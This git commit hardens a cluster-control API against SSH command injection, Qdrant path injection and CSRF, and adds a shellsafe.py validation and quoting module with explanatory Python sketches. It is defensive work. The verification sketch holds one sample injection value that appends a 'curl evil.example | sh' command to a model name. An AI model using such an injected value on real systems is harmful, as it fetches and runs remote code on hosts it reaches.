v0.19.0:0 - harden cluster-control surface: ssh injection, qdrant path, csrf

Triaged from a full independent evaluation (EVALUATION.md). Addresses the
three P0/P1 code findings; the proxy/data APIs that downstream apps consume
are deliberately untouched.

- ssh command injection (P0): new shellsafe.py validates + shlex.quotes every
  user-supplied value crossing into an SSH command on the Sparks (model repo,
  vllm args/knobs, NIM image/container/volume/port/env, service names).
  Boundary validation on POST /api/models and POST /api/nim/install; quoting at
  every sink in models/download/nim/services. NGC key now quoted too.
- qdrant path injection (P1): /api/search validates the collection name against
  a metacharacter-free whitelist and URL-encodes the path segment.
- csrf (P1): csrf_guard middleware enforces same-origin on state-changing
  control endpoints; /v1/*, /scrub, /rehydrate, /api/search, /api/audio/* and
  /api/health-event are exempt so external consumers are unaffected.
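Both P1 fixes come down to small boundary checks. The sketch below shows one way to write them. It is an illustration under stated assumptions, not the actual code. The collection whitelist (letters, digits, `_`, `-`, at most 128 characters) is assumed. The path targets Qdrant's `POST /collections/{collection_name}/points/search` REST route. `csrf_allows` is a hypothetical pure-function stand-in for the `csrf_guard` middleware: it compares the `Origin` host (or, failing that, the `Referer` host) against `Host`.

```python
from __future__ import annotations

import re
from urllib.parse import quote, urlsplit

# Assumed collection-name whitelist (the real one is not shown in this commit).
_COLLECTION_RE = re.compile(r"[A-Za-z0-9_-]{1,128}")


def collection_search_path(name: str) -> str:
    """Validate a collection name, then build the Qdrant search path for it."""
    if not _COLLECTION_RE.fullmatch(name or ""):
        raise ValueError(f"invalid collection name: {name!r}")
    # safe="" also percent-encodes '/', so the name stays a single path segment
    # even if the whitelist is ever loosened.
    return f"/collections/{quote(name, safe='')}/points/search"


# Hypothetical CSRF policy helper mirroring the exemptions listed above.
_UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
_EXEMPT_EXACT = {"/scrub", "/rehydrate", "/api/search", "/api/health-event"}
_EXEMPT_PREFIXES = ("/v1/", "/api/audio/")


def csrf_allows(method: str, path: str, host: str,
                origin: str | None = None, referer: str | None = None) -> bool:
    """Return True if the request may proceed under a same-origin policy."""
    if method.upper() not in _UNSAFE_METHODS:
        return True  # safe methods do not change state
    if path in _EXEMPT_EXACT or path.startswith(_EXEMPT_PREFIXES):
        return True  # proxy/data APIs used by external consumers
    source = origin or referer
    if not source:
        return False  # fail closed: nothing to compare against Host
    return urlsplit(source).netloc.lower() == host.lower()
```

Checking `Origin`/`Referer` against `Host` needs no token plumbing. That suits a control UI served from the same origin as its API. Rejecting requests that carry neither header is a fail-closed choice made for this sketch, and the real middleware may handle them differently.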

Verified: injection survives only as a single quoted token, vLLM preflight
shlex.split round-trip intact, CSRF behaviors covered via TestClient, both
offline redaction suites still pass, tsc clean, s9pk rebuilt.
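The first two checks in the verification line can be reproduced with the standard library alone. Here is a minimal sketch. The `huggingface-cli download` command line and the argument values are illustrative assumptions and are not taken from the actual test suite.

```python
import shlex


def quote_args(values):
    """Quote each token and join with spaces (same idea as shellsafe.quote_args)."""
    return " ".join(shlex.quote(str(v)) for v in values)


# Made-up hostile repo value of the kind the P0 finding describes.
payload = "org/model; curl evil.example | sh #"

# Illustrative remote command, built the way an ssh_run caller might build it.
cmd = f"huggingface-cli download {shlex.quote(payload)} --local-dir /models"

# shlex.split applies POSIX-shell quoting rules, so the payload comes back as
# one intact argument instead of starting a second command.
tokens = shlex.split(cmd)

# A vLLM-style argument list (illustrative values) survives quote -> split
# unchanged, including a value with a space and an embedded single quote.
vllm_args = ["--max-model-len", "32768", "--served-model-name", "it's mine"]
round_trip = shlex.split(quote_args(vllm_args))
```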
Keysat
2026-06-12 16:36:33 -05:00
parent 98988057a2
commit 1c4e861783
10 changed files with 260 additions and 24 deletions
@@ -0,0 +1,60 @@
"""Validation + safe-quoting for user-supplied values that cross into SSH shell
commands on the Sparks.
Two layers of defense (same spirit as disk.py's `_SAFE_DIRNAME`):
1. Validate at the API boundary against a strict whitelist — rejects junk
early with a clear error, and guarantees the value carries no shell
metacharacters (so it is also safe to drop into echo/log lines).
2. `quote_arg` / `quote_args` at the actual interpolation site — the real
guarantee: even a value that somehow skips validation cannot break out of
the command.
Rule: anything user-controlled that ends up in an `ssh_run` / `ssh_stream`
command string must go through one of these, never be raw f-string'd.
"""
from __future__ import annotations

import re
import shlex
from collections.abc import Iterable

# Hugging Face repo 'org/name'. HF identifiers allow letters, digits, dot, dash
# and underscore; exactly one slash separates org from name. Neither part may
# start with '-' or '.' (Hugging Face rejects those too), so a value such as
# '-x/y' cannot be mistaken for a command-line option downstream.
_HF_REPO_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._-]*/[A-Za-z0-9_][A-Za-z0-9._-]*$")

# Docker/OCI image reference: registry/path/name[:tag][@sha256:digest].
# Conservative charset covering e.g. nvcr.io/nim/nvidia/parakeet-...:latest and
# @digest pins; excludes every shell metacharacter.
_IMAGE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:/@-]*$")

# Docker container / volume name: Docker's charset (leading alphanumeric, then
# alphanumerics, '_', '.', '-').
_CONTAINER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*$")


def validate_repo(repo: str) -> str:
    """Return `repo` if it is a well-formed 'org/name'; else raise ValueError."""
    if not _HF_REPO_RE.fullmatch(repo or ""):
        raise ValueError(f"invalid model repo (expected 'org/name'): {repo!r}")
    return repo


def validate_image(image: str) -> str:
    """Return `image` if it is a well-formed container image ref; else raise ValueError."""
    if not image or len(image) > 512 or not _IMAGE_RE.fullmatch(image):
        raise ValueError(f"invalid container image reference: {image!r}")
    return image


def validate_container(name: str) -> str:
    """Return `name` if it is a valid Docker container/volume name; else raise ValueError."""
    if not name or len(name) > 128 or not _CONTAINER_RE.fullmatch(name):
        raise ValueError(f"invalid container name: {name!r}")
    return name


def quote_arg(value: object) -> str:
    """shlex.quote a single token for safe embedding in a shell command string."""
    return shlex.quote(str(value))


def quote_args(values: Iterable[object]) -> str:
    """shlex.quote each token and join with spaces."""
    if isinstance(values, (str, bytes)):
        # A bare string would otherwise be quoted character by character.
        raise TypeError("quote_args expects an iterable of tokens, not a string")
    return " ".join(shlex.quote(str(v)) for v in values)
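The following shows how a sink might combine both layers when it builds a NIM `docker run` line for `ssh_run`. This is a hypothetical sketch. `nim_run_command`, the env-var-name rule, and the in-container port 8000 are all assumptions. The image and container regexes are copied from the file above so the example runs on its own.

```python
from __future__ import annotations

import re
import shlex

# Copies of the shellsafe regexes so this sketch is self-contained.
_IMAGE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._:/@-]*")
_CONTAINER_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]*")
# Hypothetical rule: env var names restricted to the usual identifier shape.
_ENV_KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def nim_run_command(image: str, container: str, port: int, env: dict[str, str]) -> str:
    """Build a `docker run` line: validate at the edge, quote at the sink."""
    if len(image) > 512 or not _IMAGE_RE.fullmatch(image):
        raise ValueError(f"invalid container image reference: {image!r}")
    if len(container) > 128 or not _CONTAINER_RE.fullmatch(container):
        raise ValueError(f"invalid container name: {container!r}")
    if not isinstance(port, int) or not 1 <= port <= 65535:
        raise ValueError(f"invalid port: {port!r}")
    # Assumption: the service listens on port 8000 inside the container.
    parts = ["docker", "run", "-d", "--name", container, "-p", f"{port}:8000"]
    for key, value in env.items():
        if not _ENV_KEY_RE.fullmatch(key):
            raise ValueError(f"invalid env var name: {key!r}")
        # Values (API keys etc.) are free-form, so they rely on quoting alone.
        parts += ["-e", f"{key}={value}"]
    parts.append(image)
    # Every token is quoted, validated or not: quoting is the real guarantee.
    return " ".join(shlex.quote(p) for p in parts)
```

Each `KEY=value` pair is passed as a single quoted `-e` token. As a result, an NGC key containing `$(...)` or backticks reaches Docker literally instead of being expanded by the remote shell.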